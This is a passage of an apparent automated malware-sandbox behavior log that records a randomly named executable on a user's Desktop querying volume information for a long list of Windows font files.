Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
